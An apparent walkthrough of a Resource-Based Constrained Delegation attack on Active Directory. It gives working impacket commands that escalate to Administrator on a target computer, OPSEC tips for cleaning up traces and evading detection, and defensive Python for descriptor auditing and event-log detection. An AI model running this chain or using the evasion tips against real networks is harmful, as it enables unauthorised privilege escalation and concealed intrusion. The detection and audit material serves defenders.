Resource-Based Constrained Delegation Attack Chain: Full Walkthrough
Prerequisites
- A principal with an SPN that we control (a computer account is the usual choice; if ms-DS-MachineAccountQuota is above 0, which is the default of 10, any domain user can create one)
- WriteProperty on msDS-AllowedToActOnBehalfOfOtherIdentity, or GenericWrite / GenericAll / WriteDacl / WriteOwner, on the target computer object
- An impersonation target that is not in Protected Users and not marked "Account is sensitive and cannot be delegated"; the S4U2Proxy step is unreliable for those accounts
Attack Flow
1. Add Machine Account
impacket-addcomputer 'DOMAIN/user:pass' -computer-name 'ATTACKER$' -computer-pass 'P@ssw0rd123' -dc-ip 10.0.0.1
Skip this step if you already control an SPN-bearing account; creating one logs Event 4741 on the DC.
2. Write msDS-AllowedToActOnBehalfOfOtherIdentity
impacket-rbcd -delegate-from 'ATTACKER$' -delegate-to 'TARGET$' -dc-ip 10.0.0.1 'DOMAIN/user:pass' -action write
'user' is the principal that holds the write right on TARGET$. Run the same command with -action read to confirm the ATTACKER$ SID now appears in the descriptor.
3. Get S4U2Self → S4U2Proxy Ticket
impacket-getST -spn 'cifs/TARGET.domain.local' -impersonate Administrator 'DOMAIN/ATTACKER$:P@ssw0rd123' -dc-ip 10.0.0.1
getST prints the ccache file it wrote: Administrator.ccache on older impacket releases, Administrator@cifs_TARGET.domain.local@DOMAIN.LOCAL.ccache on current ones. Use whichever name it reports in the next step.
4. Use the Ticket
export KRB5CCNAME=Administrator.ccache
impacket-psexec -k -no-pass TARGET.domain.local
Address the target by the hostname in the SPN, not by IP, or the ticket will not match; add -target-ip 10.0.0.X if the name does not resolve from your box.
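What step 2 actually writes is a self-relative security descriptor whose DACL holds one ACCESS_ALLOWED_ACE per front-end SID; the KDC evaluates that DACL against the requesting service's SID during S4U2Proxy. The following Python is an added example, not code from the page or from impacket: it builds the descriptor the way impacket's rbcd.py does (owner BUILTIN\Administrators, full-control ACE per SID), parses one back, and renders it as the SDDL string you will see in Event 5136. The SID used is constructed; a real one comes from the account's objectSid in LDAP.

```python
import struct

# Layout constants for the descriptor rbcd.py writes (owner BA, full control per SID).
SE_SELF_RELATIVE = 0x8000
SE_DACL_PRESENT = 0x0004
ACCESS_ALLOWED_ACE_TYPE = 0x00
FULL_CONTROL = 0x000F01FF          # 983551, SDDL "CCDCLCSWRPWPDTLOCRSDRCWDWO"
BUILTIN_ADMINISTRATORS = "S-1-5-32-544"

# Ascending bit order, which is the order Windows prints these rights in SDDL.
SDDL_RIGHTS = [("CC", 0x1), ("DC", 0x2), ("LC", 0x4), ("SW", 0x8), ("RP", 0x10),
               ("WP", 0x20), ("DT", 0x40), ("LO", 0x80), ("CR", 0x100),
               ("SD", 0x10000), ("RC", 0x20000), ("WD", 0x40000), ("WO", 0x80000)]


def sid_to_bytes(sid):
    """Encode 'S-1-<authority>-<sub>-...' as a binary SID."""
    parts = sid.split("-")
    if parts[:2] != ["S", "1"]:
        raise ValueError("unsupported SID: %s" % sid)
    subs = [int(p) for p in parts[3:]]
    return (bytes([1, len(subs)]) + int(parts[2]).to_bytes(6, "big")
            + b"".join(struct.pack("<I", s) for s in subs))


def sid_from_bytes(buf, off):
    """Decode a binary SID at buf[off:], returning (sid_string, byte_length)."""
    revision, count = buf[off], buf[off + 1]
    if revision != 1:
        raise ValueError("bad SID revision %d" % revision)
    authority = int.from_bytes(buf[off + 2:off + 8], "big")
    subs = struct.unpack_from("<%dI" % count, buf, off + 8)
    return "-".join(["S", "1", str(authority)] + [str(s) for s in subs]), 8 + 4 * count


def build_rbcd_sd(delegate_from_sids):
    """Build the self-relative SD stored in msDS-AllowedToActOnBehalfOfOtherIdentity:
    owner BA, no group, no SACL, one full-control ACCESS_ALLOWED_ACE per front-end SID."""
    aces = b""
    for sid in delegate_from_sids:
        sid_bytes = sid_to_bytes(sid)
        aces += struct.pack("<BBHI", ACCESS_ALLOWED_ACE_TYPE, 0,
                            8 + len(sid_bytes), FULL_CONTROL) + sid_bytes
    # ACL header: AclRevision 4 (ACL_REVISION_DS), Sbz1, AclSize, AceCount, Sbz2
    dacl = struct.pack("<BBHHH", 4, 0, 8 + len(aces), len(delegate_from_sids), 0) + aces
    owner = sid_to_bytes(BUILTIN_ADMINISTRATORS)
    owner_off = 20                   # SECURITY_DESCRIPTOR header is 20 bytes
    dacl_off = owner_off + len(owner)
    header = struct.pack("<BBHIIII", 1, 0, SE_SELF_RELATIVE | SE_DACL_PRESENT,
                         owner_off, 0, 0, dacl_off)
    return header + owner + dacl


def parse_rbcd_sd(sd):
    """Return [(sid, access_mask)] for each ACCESS_ALLOWED_ACE in the DACL,
    i.e. the principals the KDC will let S4U2Proxy to this computer."""
    revision, _, control, _, _, _, dacl_off = struct.unpack_from("<BBHIIII", sd, 0)
    if revision != 1 or not control & SE_SELF_RELATIVE:
        raise ValueError("not a self-relative security descriptor")
    if not control & SE_DACL_PRESENT or dacl_off == 0:
        return []                    # no DACL: nobody may delegate
    _, _, _, ace_count, _ = struct.unpack_from("<BBHHH", sd, dacl_off)
    off, allowed = dacl_off + 8, []
    for _ in range(ace_count):
        ace_type, _, ace_size, mask = struct.unpack_from("<BBHI", sd, off)
        if ace_type == ACCESS_ALLOWED_ACE_TYPE:
            allowed.append((sid_from_bytes(sd, off + 8)[0], mask))
        off += ace_size              # skip any ACE type we do not interpret
    return allowed


def to_sddl(sd):
    """Render the descriptor as Event 5136 shows it, e.g.
    O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-...-1105)."""
    owner_off = struct.unpack_from("<BBHIIII", sd, 0)[3]
    owner = sid_from_bytes(sd, owner_off)[0] if owner_off else ""
    owner = "BA" if owner == BUILTIN_ADMINISTRATORS else owner
    aces = []
    for sid, mask in parse_rbcd_sd(sd):
        rights = "".join(tag for tag, bit in SDDL_RIGHTS if mask & bit)
        if mask & ~sum(bit for _, bit in SDDL_RIGHTS):
            rights = "0x%x" % mask   # bits without a two-letter tag: numeric form
        aces.append("(A;;%s;;;%s)" % (rights, sid))
    return "O:%sD:%s" % (owner, "".join(aces))


if __name__ == "__main__":
    # Constructed SID standing in for ATTACKER$'s objectSid.
    sd = build_rbcd_sd(["S-1-5-21-1004336348-1177238915-682003330-1105"])
    print(len(sd), "bytes:", sd.hex())
    print(to_sddl(sd))
```

Reading the attribute back from LDAP and feeding the raw bytes to parse_rbcd_sd is the quickest way to audit which accounts may delegate to a given computer, and to confirm that a cleanup actually emptied the DACL.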
OPSEC
- Use an existing computer account you already control instead of creating a new one; impacket-addcomputer leaves a 4741 event and a machine account owned by a low-privilege user, both easy to spot
- Remove the ACE from msDS-AllowedToActOnBehalfOfOtherIdentity after use (impacket-rbcd with -action remove, or -action flush to clear the attribute); the attribute is empty on almost every computer object, so a leftover value stands out
- Avoid psexec, which uploads a service binary and registers a service on the target; use WMI or scheduled tasks for less noisy lateral movement
Detection
- BloodHound: the AddAllowedToAct edge onto computer objects (and the GenericWrite, GenericAll, WriteDacl and WriteOwner edges that imply it) shows who can set this chain up; review those paths before an attacker does.
- Event 5136 (needs Directory Service Changes auditing) with AttributeLDAPDisplayName = msDS-AllowedToActOnBehalfOfOtherIdentity is the cleanest signal; the AttributeValue is the SDDL string and names the delegate-from SID.
- Event 4662 with Write Property (AccessMask 0x20) on a computer object and the attribute's schemaIDGUID, 3f78c3e5-f79a-46bd-a0b8-9d18116ddc79, in the Properties field, where only object access auditing with a SACL on computer objects is available; confirm the GUID against your own schema before deploying the rule.
- Event 4741 (computer account created) by an ordinary user shortly before either of the above ties the chain together.
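The detection logic above, run over constructed sample Security log records, as an added example that is not part of the original page. The event field names follow the EventData of the Windows Security log; the event records, SIDs and object names are made up, and the attribute GUID is an assumption to verify against your schema.

```python
import re

RBCD_ATTR = "msDS-AllowedToActOnBehalfOfOtherIdentity"
# schemaIDGUID of the attribute as it appears in the 4662 'Properties' field.
# Assumption: confirm it against your forest's schema before relying on it.
RBCD_ATTR_GUID = "3f78c3e5-f79a-46bd-a0b8-9d18116ddc79"
COMPUTER_CLASS_GUID = "bf967a86-0de6-11d0-a285-00aa003049e2"
WRITE_PROPERTY = 0x20                # 4662 AccessMask bit for Write Property
VALUE_ADDED = "%%14674"              # 5136 OperationType for a value being added
SID_RE = re.compile(r"S-1-5-21(?:-\d+){4}")   # domain account SIDs inside the SDDL value

# Constructed sample events; not real log data.
SAMPLE_EVENTS = [
    {"EventID": 4741, "SubjectUserName": "user", "TargetUserName": "ATTACKER$"},
    {"EventID": 5136, "SubjectUserName": "svc_backup",
     "ObjectDN": "CN=FS01,OU=Servers,DC=domain,DC=local",
     "AttributeLDAPDisplayName": "description", "OperationType": VALUE_ADDED,
     "AttributeValue": "File server"},
    {"EventID": 5136, "SubjectUserName": "user",
     "ObjectDN": "CN=TARGET,OU=Servers,DC=domain,DC=local",
     "AttributeLDAPDisplayName": RBCD_ATTR, "OperationType": VALUE_ADDED,
     "AttributeValue": "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;"
                       "S-1-5-21-1004336348-1177238915-682003330-1105)"},
    {"EventID": 4662, "SubjectUserName": "user",
     "ObjectName": "CN=TARGET,OU=Servers,DC=domain,DC=local",
     "ObjectType": "%{" + COMPUTER_CLASS_GUID + "}",
     "AccessMask": "0x20",
     "Properties": "%%7685\n\t{" + RBCD_ATTR_GUID + "}\n\t{" + COMPUTER_CLASS_GUID + "}"},
    {"EventID": 4662, "SubjectUserName": "admin",      # Read Property only: benign
     "ObjectName": "CN=TARGET,OU=Servers,DC=domain,DC=local",
     "ObjectType": "%{" + COMPUTER_CLASS_GUID + "}",
     "AccessMask": "0x10",
     "Properties": "%%7684\n\t{" + RBCD_ATTR_GUID + "}\n\t{" + COMPUTER_CLASS_GUID + "}"},
]


def rbcd_alerts(events):
    """Flag writes to msDS-AllowedToActOnBehalfOfOtherIdentity and record whether
    the same subject created a machine account (4741) earlier in the stream."""
    new_accounts = {}                # subject -> computer accounts it created
    alerts = []
    for ev in events:
        eid, subject = ev.get("EventID"), ev.get("SubjectUserName")
        if eid == 4741:
            new_accounts.setdefault(subject, []).append(ev.get("TargetUserName"))
        elif (eid == 5136 and ev.get("AttributeLDAPDisplayName") == RBCD_ATTR
              and ev.get("OperationType") == VALUE_ADDED):
            alerts.append({"rule": "rbcd_write_5136", "subject": subject,
                           "target": ev.get("ObjectDN"),
                           "delegate_sids": SID_RE.findall(ev.get("AttributeValue", "")),
                           "created_accounts": new_accounts.get(subject, [])})
        elif (eid == 4662 and int(ev.get("AccessMask", "0x0"), 16) & WRITE_PROPERTY
              and RBCD_ATTR_GUID in ev.get("Properties", "").lower()):
            alerts.append({"rule": "rbcd_write_4662", "subject": subject,
                           "target": ev.get("ObjectName"), "delegate_sids": [],
                           "created_accounts": new_accounts.get(subject, [])})
    return alerts


if __name__ == "__main__":
    for alert in rbcd_alerts(SAMPLE_EVENTS):
        print(alert)
```

The 5136 path gives you the delegate-from SID straight from the SDDL, so the alert can name the account that gained delegation rights; the 4662 path only tells you the attribute was written, which is why it is paired with the 4741 lookup to suggest which account to check.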